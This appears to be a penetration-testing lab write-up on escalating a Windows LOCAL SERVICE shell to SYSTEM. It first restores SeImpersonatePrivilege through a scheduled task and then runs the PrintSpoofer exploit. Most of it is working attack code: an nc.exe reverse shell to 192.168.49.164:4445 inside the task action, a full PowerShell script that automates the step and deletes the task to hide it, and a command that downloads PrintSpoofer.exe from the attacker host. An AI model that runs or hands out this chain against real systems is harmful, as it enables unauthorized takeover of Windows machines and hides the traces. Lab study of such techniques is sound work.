PrintSpoofer PE (instantly become SYSTEM!)
- PrintSpoofer is an exploit that escalates a service account to SYSTEM on Windows Server 2016, Server 2019 and Windows 10 by abusing the Print Spooler service (which must therefore be running). To escalate, the account you run it from must hold SeImpersonatePrivilege.

```
PrintSpoofer.exe -i -c cmd
```

`-c` is the command to run as SYSTEM and `-i` keeps it interactive in the current console. Run from a shell that already carries the privilege, this drops you straight into a SYSTEM prompt. If the shell lacks the privilege, you first have to get it back, which is what the rest of this page is about.

Reading through the privileges of the shell we have (`whoami /priv`) confirms that SeImpersonatePrivilege is missing. The account is LOCAL SERVICE, whose default privilege set does include SeImpersonatePrivilege; the service we landed in just runs with a stripped-down token. The privilege can be retrieved by registering a scheduled task as LOCAL SERVICE with a ScheduledTaskPrincipal whose RequiredPrivilege attribute lists SeImpersonatePrivilege: the task's process is started with a fresh token that carries every privilege named there (only privileges from the account's default set can be requested). The task action is a reverse shell, so the new token comes back to us.

```powershell
# Create a list of privileges (all from LOCAL SERVICE's default set)
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
# Create a Principal for the task that requests those privileges
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
# Create an action for the task: a reverse shell back to our listener
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4445 -e cmd.exe`""
# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal

TaskPath                          TaskName                          State
--------                          --------                          -----
\                                 GrantAllPerms                     Ready

# Start the task (a new shell should hit the listener on 4445)
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"
```
In the new reverse shell, `whoami /priv` now lists SeImpersonatePrivilege. Let's get into the system with PrintSpoofer from there!
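The whole re-spawn step as one script, as an added example rather than the page's own transcript: it checks whether the current token already has SeImpersonatePrivilege, and only if not registers the LOCAL SERVICE task, fires it and removes the task definition again so nothing is left behind. The listener address, port and nc.exe path are the ones used above; the task name, the sleep and the cleanup step are this example's own choices, not something the original page did.

```powershell
# Added example (not the page's own code): restore SeImpersonatePrivilege to a
# LOCAL SERVICE shell via a scheduled task, then clean the task up.
# Assumed values: listener 192.168.49.164:4445 and C:\wamp\www\nc.exe (from the
# page); task name, wait time and cleanup are assumptions of this example.

$Listener = "192.168.49.164"
$Port     = 4445
$NcPath   = "C:\wamp\www\nc.exe"
$TaskName = "GrantAllPerms"

# whoami /priv prints a line for a privilege only if the token holds it at all
# (Enabled or Disabled); a token that never had it shows no line.
function Test-HasPrivilege([string]$Name) {
    $out = whoami /priv 2>$null
    return [bool]($out | Select-String -Pattern "^\s*$Name\s" -Quiet)
}

if (Test-HasPrivilege "SeImpersonatePrivilege") {
    Write-Host "[*] SeImpersonatePrivilege already present; run PrintSpoofer directly."
    return
}

# Principal for LOCAL SERVICE that explicitly requests the privileges the new
# token must carry. RequiredPrivilege can only grant privileges from the
# account's default set, and LOCAL SERVICE's set includes SeImpersonatePrivilege.
$Privs = @(
    "SeAssignPrimaryTokenPrivilege",
    "SeAuditPrivilege",
    "SeChangeNotifyPrivilege",
    "SeCreateGlobalPrivilege",
    "SeImpersonatePrivilege",
    "SeIncreaseWorkingSetPrivilege"
)
$Principal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" `
    -LogonType ServiceAccount -RequiredPrivilege $Privs

# Action: a reverse shell, spawned from the task's freshly built token.
$Cmd    = "$NcPath $Listener $Port -e cmd.exe"
$Action = New-ScheduledTaskAction -Execute "powershell.exe" `
    -Argument "-ExecutionPolicy Bypass -Command `"$Cmd`""

# Register, fire, then delete the task definition. Deleting a task does not
# terminate a process it has already started, so the shell keeps running.
try {
    Register-ScheduledTask -TaskName $TaskName -Action $Action `
        -Principal $Principal -Force | Out-Null
    Start-ScheduledTask -TaskName $TaskName
    Start-Sleep -Seconds 5   # give the task engine time to spawn the child
} finally {
    Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false `
        -ErrorAction SilentlyContinue
}
Write-Host "[+] Task fired; check whoami /priv in the shell on ${Listener}:$Port"
```

In the shell that comes back, `whoami /priv` should now list SeImpersonatePrivilege, and PrintSpoofer can be run from that shell exactly as at the top of the page (with `-c` pointing at a second reverse shell if you need SYSTEM to call back rather than sit in the console).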

Pull PrintSpoofer onto the box from the same host:

```
powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164:8080/PrintSpoofer.exe","C:\wamp\www\prints.exe")
```

Run it from the new shell as shown at the top of the page, and we are SYSTEM: rooted!